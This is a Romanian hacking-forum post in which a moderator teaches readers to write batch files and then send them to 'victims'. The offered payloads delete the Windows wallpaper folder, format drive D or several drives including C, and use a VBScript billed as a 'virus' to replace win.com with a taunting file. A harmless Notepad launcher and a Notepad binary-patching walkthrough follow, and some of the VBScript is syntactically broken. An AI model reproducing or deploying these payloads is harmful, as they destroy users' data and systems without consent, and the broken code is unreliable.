HackersRo.3xforum.Ro
Hack-eri romani se intalnesc pe acest forum pentru a creea cele mai tari programe de hacking !
|
Lista Forumurilor Pe Tematici
|
HackersRo.3xforum.Ro | Reguli | Inregistrare | Login
POZE HACKERSRO.3XFORUM.RO
Nu sunteti logat.
|
Nou pe simpatie:
sexy_andrea2006 la Simpatie.ro
 | Femeie
22 ani
Sibiu
cauta Barbat
22 - 48 ani |
|
|
roteam
Moderator
Inregistrat: acum 13 ani
Postari: 61
|
|
Eu am facut deja o recomandare pentru a fii o sectiune despre acest tip de programe dar deocamdata nu m-a ascultat nimeni , il gasiti aici viewtopic.php?f=42&t=8284
Cum se face un fisier .bat ? Pai e foarte simplu .
Toate se bazeaza pe comenzi din cmd ce se pot forma intr-uneditor de text si au ca scop executarea unei comenzi de exemplu stergerea unui fisier , inchiderea calculatorului , formatarea unei partitii etc ...
voi enumera cateva moduri de a enerva pe cineva cu aceste comenzi .
1) Stergerea pozei de pe desktop .
Scrieti intr-un notepad urmatoarele : "rmdir C:\WINDOWS\Web\Wallpaper /S /Q" fara ghilimele si salvatil cu extensia .bat , apoi il trimiteti victimei .
Ce se intampla defapt :
Aceasta comanda sterge folderul din windows in care se duc pozele de pe desktop , cel care deschide acest fisier nu v-a mai putea sa aiba o poza pe desktop .
2) Formatarea unei partitii .
Scrieti intr-un notepad urmatoarele (fara ghilimele) : format D:\ /S /Q si salvati cu extensia .bat
Ce se intampla defapt : Aceasta este una dintre celelalte comenzi din cmd si formateaza partitia "D"
3) Formateaza toate partitiile inafara de "C" :
Scrie intr-un notepad urmatoarele (fara ghilimele) .
@echo off
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
format t: /q /y
si salveaza cu extensia .bat
4) Porneste notepad intr-un altfel .
Scrie asta intr-un notepad si pune extensia .bat
@echo off
echo.
echo apasa enter pentru a porni notepad
pause > nul
Notepad.exe %1
if errorlevel 1 goto error
echo.
echo Notepad a terminat ce avea de facut.
goto end
:error
echo.
echo Ceva nu a functionat cu Notepad.
:end
Altceva nu va mai dau fiindca vreau sa invatat si singuri , desigur daca va place dar am sa va daau niste trucuri care nu tin de asta dar sunt bune de stiut .
1) pentru a face un virus mai complex :
Scrieti intr-un notepad urmatoarele : Dim fso, fs1, fs2
Dim drive, folder, file
Set fso = CreateObject("Scripting.FileSystemObject"
drive = "c:\"
folder ="windows\"
file = "win.com"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.copy ("c:\windows\temp\win.com"
set fs2=fso.CreateTextFile("c:\windows\win.com"
fs2.writeline "win.com is gone images/smiles/icon_biggrin.gif"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.delete
fs2.close
Dar nu stiu daca e extensia .bat sau .vbs , incercati-le pe amindoua .
2) O problema cu notepad , daca va va place acest tip de programare veti avea nevoie ca notepdu-l vostru sa fie destul de bun .
Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare
mesajul "the file is too large for notepad to open...Haideti sa scapam de acest mesaj
si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.
1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew
2) cunostinte minime de assembler
-dezasamblati programul in w32dasm
-activati optiunea "string reference" si cautati sirul "the file is too large..."
-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import
-cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)
-dati dublu click pe ea si obtineti ceva de genul
call dword ptr [00407430] {chemarea procedurii de mesaj}
cmp eax,0000006{compara registrul eax cu adresa procedurii}
jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni
la selectarea lui OK se deschide Wordpad iar altfel iese.
Celelalte instructiuni nu mai conteza
- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset
-inchideti w32dasm
-deschideti Hiew "hiew notepad.exe"
-selectati F4 optiunea decode
-F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)}
-F3 scrieti 404840484048
-F9 pentru a valida introducerea
-F5,scrieti numarul pentru jne care este 216A
-F3,scrieti 404840484048
-F9 pentru a actualiza si Gata!!!
Ce dracu' este 404840484048?
40-in hexazecimal inseamna "inc eax" adica adauga 1
48-inseamna "dec eax" adica scade 1
90 inseamna NOP adica instructiunea nula(nu face nimic)
Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune
asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1)
Altceva nu stiu ce as putea sa va mai spun , sper c-am fost de ajutor .
|
|
| pus acum 13 ani |
|